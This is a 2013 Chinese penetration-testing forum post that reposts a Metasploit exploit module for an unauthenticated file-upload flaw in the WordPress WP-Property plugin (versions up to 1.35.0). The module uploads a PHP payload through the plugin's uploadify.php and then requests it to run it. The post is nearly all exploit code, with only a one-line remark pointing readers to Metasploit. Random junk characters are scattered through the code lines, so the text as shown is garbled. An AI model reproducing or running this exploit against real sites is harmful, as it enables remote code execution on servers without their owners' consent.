找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress WP-Property PHP 文件上传漏洞
返回列表 发新帖
查看: 2978|回复: 0
打印 上一主题 下一主题

WordPress WP-Property PHP 文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-4 19:51:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
WordPress WP-Property PHP 文件上传漏洞
5 P  v- R0 Z# i5 W4 }7 Y0 M4 q
$ v- y) u( d+ q3 p3 ?, B ## # This file is part of the Metasploit Framework and may be subject to
" `  F# _8 u3 X3 S, J/ S3 ]  A1 d1 m4 V# I. w
# redistribution and commercial restrictions. Please see the Metasploit/ a3 c+ B2 R$ N7 }+ i9 m. q

( m% q8 X4 D1 j. [# Framework web site for more information on licensing and terms of use.& v; e( R- _8 U/ Z- Z( }" k, Q
) p/ d, Z6 L8 o6 I
#   http://metasploit.com/framework/ ##
# {# B1 N% X# F# d6 r6 S+ e& S  ^$ {5 n3 {: i( n

' k( x' n! s3 M1 g" P1 l) X. j' K# T

" K% Z/ B* h, Q' J& |2 V. C, Z5 E0 @1 C+ M* ^! b, U
require 'msf/core'
& U+ _$ L2 E1 b7 J( O1 Xrequire 'msf/core/exploit/php_exe'& L$ R2 k& u, J. G( [
. ~! z4 A7 ~) ~
class Metasploit3 < Msf::Exploit::Remote     Rank = ExcellentRanking       include Msf::Exploit::Remote::HttpClient     include Msf::Exploit:hpEXE       def initialize(info = {})         super(update_info(info,             'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
1 a' N% R1 u! D  t- {: D'Description'    => %q{
  `" ~2 K# Z+ R1 RThis module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress                 plugin. By abusing the uploadify.php file, a malicious user can upload a file to a                 temp directory without authentication, which results in arbitrary code execution.             },             'Author'         =>! L2 q2 R( ?5 m7 }. g
[) v  Q9 [( V  a* R" b
'Sammy FORGIT', # initial discovery
. Y9 P! X3 b$ P'James Fitts <fitts.james[at]gmail.com>' # metasploit module
& ]; V, ?9 m. ?0 r/ b],
. l# {3 v! V0 V0 N( f% F9 x'License'        => MSF_LICENSE,9 W% o9 V# K" A5 E! l8 Y
'References'     =>
# [- Z! O, q6 r3 l' N; v[1 j+ t8 d& T) }9 ^9 b1 H7 S/ F$ \
[ 'OSVDB', '82656' ],) `1 v7 [0 f' `! h
[ 'BID', '53787' ],
: L  ^. |* ~- C' \' m! h[ 'EDB', '18987'],. ~5 D7 Y$ G9 v
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]' v0 q4 J3 s7 J
],
, K5 F9 F. ?: d" n+ X. ~'Payload'        =># T' N( Z9 q/ X1 p" I0 s6 [
{
" q  C. U( S, [- C8 B'BadChars' => "\x00",: `! W% N0 J: J! ]4 ^/ G
},5 H( h; b8 U0 C9 U& B8 w
'Platform'       => 'php',. ]+ ?. N  T+ q% k. \
'Arch'           => ARCH_PHP,' i6 q$ r* H' {; }5 v
'Targets'        =>
% {. E; J& g4 ]& ?; E[
" L5 e1 C2 h0 F, b( N- u[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
1 N7 B/ B4 N1 B: C2 i, H& B5 {[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
, v6 s/ l7 a! a' I. }1 q],6 u( j; Q  ^) m$ B: Q6 K
'DefaultTarget'  => 0,3 w, ~* @  I* z7 V: ]# F/ d) ^+ A
'DisclosureDate' => 'Mar 26 2012'))
" K6 Q/ F, \* i
9 Q# Y; E* G% P3 {3 x1 ^3 l, jregister_options(
  h) a+ A' @$ V7 \$ ~* J0 C/ Z: e[
, I" Q( k! @0 \; Q1 DOptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])$ {" R# N& b9 u4 Z" a- V- h
], self.class)
+ ]- A3 c: y( T5 r7 \end
  Q1 h) t; @" U# o* q9 q4 q1 ^+ y% F5 h# f4 J
def check
+ d8 D4 }% j* `; {( I4 buri =  target_uri.path5 u+ m2 @* F) J
uri << '/' if uri[-1,1] != '/'           res = send_request_cgi({             'method' => 'GET',. Y! q0 i4 \* W& ^" J
'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"  P  A9 ?0 z3 W% |' R/ m
})
5 M: w7 R2 k4 j: q& \1 z4 ~
& B- p; p5 V# N4 R, Eif not res or res.code != 2003 M8 y. Q; y1 q8 k2 g! A! G7 B
return Exploit::CheckCode::Unknown
( x9 t/ L. e% R( i: K8 ~end
4 c3 G  X. |# z, ?: X. @
  {: D/ @% ?, _9 N4 Oreturn Exploit::CheckCode::Appears! j& \9 y1 {5 u! y* n2 O
end+ [; v! V7 [" o# i3 y8 h* e3 q

5 w6 q' W) t9 Ndef exploit) X( C9 I/ j" a) E0 H% |3 J
uri =  target_uri.path( }- ^0 ]. |, j( F
uri << '/' if uri[-1,1] != '/'           peer = "#{rhost}:#{rport}"           @payload_name = "#{rand_text_alpha(5)}.php"         php_payload = get_write_exec_payload(:unlink_self=>true)- K/ i% d: d4 K( I) }7 L6 u
4 [! R/ s( B& x+ ~6 y: ^
data = Rex::MIME::Message.new
2 {- i" g* c0 f* Idata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")* ]4 b, b' D& G0 Y+ b. |
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")1 T$ w# p1 c% }9 P. P4 o) f
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')* K) H$ p# c$ |/ B# _# s5 O
3 R8 L# ~; H* \
print_status("#{peer} - Uploading payload #{@payload_name}")* S( r- Y! m# w7 z) n7 n
res = send_request_cgi({
1 A0 h+ a) |& _9 P4 _2 \'method' => 'POST',. @% _$ [9 B( A- F( W% U
'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
7 Z5 g4 j- ~( S! z  C$ {( _) K$ n, \0 {'ctype'  => "multipart/form-data; boundary=#{data.bound}",: ~2 b& S3 d  C& l% X3 t
'data'   => post_data& f) C+ K1 ^# n( T% \
}), O! j1 J* L4 \0 U% ?
0 U, c/ X; T2 F1 D
if not res or res.code != 200 or res.body !~ /#{@payload_name}/
. z) j$ K* d3 ]) K0 z7 h2 rfail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
0 @9 i( W" ]4 l+ K7 [end0 C4 x; [4 I' w7 p' f

3 L; X) N* B  O) j6 z& k- ~upload_uri = res.body8 X9 [& _  K3 O+ I" s; x
8 V# w; p1 g' k8 I) o
print_status("#{peer} - Executing payload #{@payload_name}")
& e+ V4 P# w. y8 t: ores = send_request_raw({
4 f; a3 d8 x& ~4 i2 U8 P'uri'    => upload_uri,& b5 O) m1 w- Z, N3 g9 N9 f
'method' => 'GET'8 S# T/ {3 x( i; f
})+ {9 Z8 z# R+ b) T$ f
end+ S! P; Z" }. H* I3 @1 |' x
end/ l* g# W4 {1 @: ]
# j# H3 \/ q. i4 g
不要问我这写的是什么 怎么利用 我是说msf.
* C& B) ~" k+ x# h/ p6 b# N( N# v# m+ m0 H: m$ X
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表